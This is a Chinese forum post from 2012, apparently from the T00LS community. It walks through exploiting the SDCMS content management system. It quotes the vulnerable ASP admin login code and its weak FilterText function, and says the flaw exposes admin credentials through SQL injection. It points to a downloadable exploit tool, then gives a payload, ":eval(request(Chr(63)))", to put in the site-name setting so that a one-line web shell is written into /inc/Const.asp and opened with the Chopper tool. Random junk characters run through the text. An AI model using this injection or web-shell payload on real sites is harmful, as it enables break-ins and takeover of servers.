作者:T00LS 鬼哥. L. C9 a2 b8 o7 @
漏洞文件:后台目录/index.asp% m/ x7 ^7 r: H) W+ Q) t
1 u6 \7 }5 j0 {4 o
Sub Check
- J( |. W( d' T2 F; I+ T L Dim username,password,code,getcode,Rs2 w* E X( J |1 D
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub5 h- v3 G/ C6 @; p+ I+ F) B) F
username=FilterText(Trim(Request.Form("username")),1)
5 j' Q- N0 {0 n: w password=FilterText(Trim(Request.Form("password")),1)' U% N9 {. ^! T4 b! V
code=Trim(Request.Form("yzm"))
* u6 y4 Y. q% f, b9 A8 k getcode=Session("SDCMSCode")( k# ?: h \/ n& ?+ @7 b7 y! k/ `3 s' P
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
) Y; N, N1 } z/ d IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
% w5 a, c( ]* g IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
& u" s! Z& a/ h8 }5 X IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
7 E+ @+ A7 L% s7 x4 L IF username="" or password="" Then
8 j4 f! U2 J. I9 z Echo "用户名或密码不能为空"ied7 i1 s1 Q" p% D; }4 W
Else
. x9 \% t8 g. O0 G Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")4 R/ i3 Z" K( k9 Y, M
IF Rs.Eof Then
6 J% O; g6 `9 O8 Q1 m AddLog username,GetIp,"登录失败",1, Z8 C& S6 Q9 p: j" ~# ]
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"5 ?7 Q- ?5 T$ Z$ H1 T& c: U# c
Else. r2 p9 v+ e6 Z" z) d
Add_Cookies "sdcms_id",Rs(0)0 s5 ^" }& ]4 d+ t. ^
Add_Cookies "sdcms_name",username
5 e) M1 q! c/ s: V; y Add_Cookies "sdcms_pwd",Rs(2)6 ~( |+ { B, O* s! Q! ^! W
Add_Cookies "sdcms_admin",Rs(3)$ d0 `2 Z O2 M6 P/ X1 _9 }5 l
Add_Cookies "sdcms_alllever",Rs(4)
" @" }' q, }* S; c1 X V Add_Cookies "sdcms_infolever",Rs(5)+ i6 V: ^, I1 I! c1 h
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
a l! @5 l! z: h" ?1 D) ~ AddLog username,GetIp,"登录成功",1
3 R9 S" T, }' h9 J8 ^. @ '自动删除30天前的Log记录
" S) C B7 Q- t. Q! [ IF Sdcms_DataType Then
" p/ T3 o' \) ^0 N% q7 ~. E Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
: X3 T$ G5 A4 R# C Else
1 X0 R: Q, \. c6 u6 W( v Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
" m' Z- m$ s, X' x5 L, Y End IF
, a9 ^; f. @! {/ G, `7 J7 x2 q Go("sdcms_index.asp"), f" W9 }# e V, a }; W
End IF
/ U. I) s0 l$ | v3 T" R Rs.Close6 g) B7 D$ H- r
Set Rs=Nothing
* u' O% o8 t$ u* i, G End IF
0 h+ [7 s! A" U* X% IEnd Sub
- Z4 K" K+ d {( f& X3 g: ~4 D
# ]& m( k9 L& g5 p’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码5 |9 b" P8 @/ Y, F/ B' c& i) E/ C
9 P( V* y6 T) M3 [Function FilterText(ByVal t0,ByVal t1)+ j* X- _, c, m( A Q+ k* t
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
- i/ j1 z8 e; ~! K1 [8 V t0=Trim(t0)
" v* }. Y/ L# k) }! j. S Select Case t1
2 k# X2 Q' t* f) C. O G5 _ Case "1"9 q2 p7 e& S* h G5 E" V$ ^2 W
t0=Replace(t0,Chr(32),"")
. R' c* g( Z- K9 t0 a! j& `1 [ t0=Replace(t0,Chr(13),"")$ F( N) f! n% G( ]: D- N
t0=Replace(t0,Chr(10)&Chr(10),""); @! P! o( Q+ O- u. o
t0=Replace(t0,Chr(10),"")# G [% y6 o8 O3 U: p! o: O
Case "2"
! @4 q" W1 i, H, z6 p t0=Replace(t0,Chr(8),"")'回格4 K' `- `. ^7 t& D. X! [6 u
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
' k# _/ S6 I, W1 n0 d G2 ~ t0=Replace(t0,Chr(10),"")'换行1 q) Y3 R9 B: V4 o& [
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)8 Y8 z/ h1 T5 M8 c& ~5 o- q% B; Y4 P
t0=Replace(t0,Chr(12),"")'换页' P. c0 h8 p: d1 U
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
0 Z: T# `* _* Z' P4 n0 R t0=Replace(t0,Chr(22),"")1 X! j0 x& H) s7 v! ]8 O
t0=Replace(t0,Chr(32),"")'空格 SPACE) s% P6 c6 f% M4 u9 J
t0=Replace(t0,Chr(33),"")'!. s/ U# Z; u& f# {8 j8 c
t0=Replace(t0,Chr(34),"")'"/ X4 u$ ]% \+ m% J0 h/ W
t0=Replace(t0,Chr(35),"")'#
9 O% [2 f( o- S/ i) \6 x t0=Replace(t0,Chr(36),"")'$
" N! S1 v0 {- b v. v( C+ o t0=Replace(t0,Chr(37),"")'%
. i) k" v. d- ^8 \ t0=Replace(t0,Chr(38),"")'&
3 e* @" E/ ?! F! T" A t0=Replace(t0,Chr(39),"")''# u4 V$ w! j0 z. G- a5 [1 O
t0=Replace(t0,Chr(40),"")'(
3 j' E( M* `/ B1 _* K1 |: t# c t0=Replace(t0,Chr(41),"")')( `2 F6 |$ e! c6 K" t
t0=Replace(t0,Chr(42),"")'*5 ~0 R( N) o3 ^6 {7 i
t0=Replace(t0,Chr(43),"")'+
7 ^8 |4 `* O0 c6 Q+ x5 L t0=Replace(t0,Chr(44),"")',3 z* l2 F& ?" r6 v+ W
t0=Replace(t0,Chr(45),"")'-
! B' n4 t N; Q8 s1 L4 J d t0=Replace(t0,Chr(46),"")'.
. n3 G: c9 v: ~ t0=Replace(t0,Chr(47),"")'/
1 X1 J9 i) n$ C ^, r t0=Replace(t0,Chr(58),"")':
8 B9 `: }9 z* b d# R t0=Replace(t0,Chr(59),"")';
# p* z3 p# S. [0 ?/ k* | t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
/ s0 R* H# D S% y6 d t0=Replace(t0,Chr(63),"")'?" P( o( t" ]& B7 c
t0=Replace(t0,Chr(64),"")'@
8 _ X$ c( U4 e' x t0=Replace(t0,Chr(91),"")'\
9 D# D- s- B" F; H t0=Replace(t0,Chr(92),"")'\5 f2 c% H" }' f" s8 K5 D
t0=Replace(t0,Chr(93),"")'] |" ]6 C2 D/ b* i
t0=Replace(t0,Chr(94),"")'^; c& s- } I) `" F3 D; ~
t0=Replace(t0,Chr(95),"")'_
7 | u3 y% l$ D. u. I t0=Replace(t0,Chr(96),"")'`" ?6 x( Y. X: ?% K3 E
t0=Replace(t0,Chr(123),"")'{6 P" ?0 I4 W* a: s5 N+ z
t0=Replace(t0,Chr(124),"")'|% z0 ~0 A4 a1 M2 `
t0=Replace(t0,Chr(125),"")'}
: ]; Y1 S. W4 m& n& {$ @ t0=Replace(t0,Chr(126),"")'~4 U& P" J2 J% J8 ~ N( i! w2 I
Case Else/ q5 e7 j8 |1 y, G, G, l' F- o
t0=Replace(t0, "&", "&")
" i- p/ E9 f! H8 {) L) z+ F$ ~ t0=Replace(t0, "'", "'")
a; o5 d, F: G t0=Replace(t0, """", """)
% y* N1 P& _' B8 q `9 d t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")2 j, H+ F( b3 y( Y, ^+ n
End Select* |- l5 c& u. J# Z& k& F3 }% V
IF Instr(Lcase(t0),"expression")>0 Then
+ Z* Q$ O u; Y1 w/ z$ e. j2 Z t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
) ]# Q, R/ X8 v2 _: u End If5 U, a7 @6 l# X* N( C; F
FilterText=t0
^5 w+ f) F2 |+ ]/ V! pEnd Function
6 {/ [. v9 r2 [3 Z; |6 F
( r+ r, p- Y! Z/ q- Y8 k9 G3 L: C6 k看到没。直接参数是1 只过滤, P& S- w1 L6 A, H
t0=Replace(t0,Chr(32)," ")
2 M4 K1 n& M" e0 V( ?" L: P8 \+ ]8 B t0=Replace(t0,Chr(13),"")
$ p: J5 e$ Z1 a% Y t0=Replace(t0,Chr(10)&Chr(10),"! n2 _: X& ^0 l( B
")
# ?3 V$ x; d3 @& O5 ]* F t0=Replace(t0,Chr(10),"8 A, N/ Z9 p8 G
")& X2 x$ ?5 n6 I2 E! Q! E) x5 f
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!$ X9 q; ^# T# @9 o; R% E
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
& l9 H, }4 T; a2 H& P
4 y6 g; R# X2 y! A# F测试:
3 {, M, n5 {; M5 D- E p9 q3 @2 Y6 {- z6 X1 N# V4 ]' P
# Y: ^% T! g7 A$ L1 D) \% F
现在输入工具上验证码,然后点OK H6 M; P4 x& {% d( [+ F6 h" O$ \6 M
- n- ]; Q1 q% }* n
4 {6 Q8 P. Y! v% I
看到我们直接进入后台管理界面了,呵呵!+ }6 K z: h9 O' U" u4 L3 P
; ?& w* o Q& O4 \6 W8 @/ W
3 C% n( s' }2 K! Q$ q) R* {1 `0 @% c3 E
这样直接进入后台了。。。。
$ w: {9 M6 `7 K, ]2 A9 U1 i& N- l# W1 Q1 T. G2 l
5 e1 d5 M0 l ]0 W; h$ J! ?& y. F( v- A0 m
SDCMS提权:& J2 b! Z m& m1 n4 ^
3 |2 E$ n1 b/ I
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
- B# A$ T3 I& ^; D* D! V6 N$ R; ~) t9 ]; o4 P% Y% l
3 ^+ q4 T+ A* T
1 K. ?+ a% { h) t$ \, tOK,现在用菜刀连接下!5 @/ T- E4 I8 } G- Y7 |% N2 P
6 P( L9 [3 V8 { S9 u; q6 t/ c( C/ b
' w/ {4 }" y9 P1 S0 Q$ z4 u9 { ( ?5 \5 b+ O( ?! f
. o' ]( ?5 v6 C9 J
|
发表于 2012-11-9 20:57:02
收藏
支持
反对